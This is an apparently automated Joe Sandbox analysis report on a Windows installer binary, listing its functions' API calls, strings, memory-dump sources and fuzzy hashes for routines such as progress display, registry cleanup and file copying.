                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00065A00,00000064,0012AF1F), ref: 00403295
                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                        Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                        Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                        Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                        Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
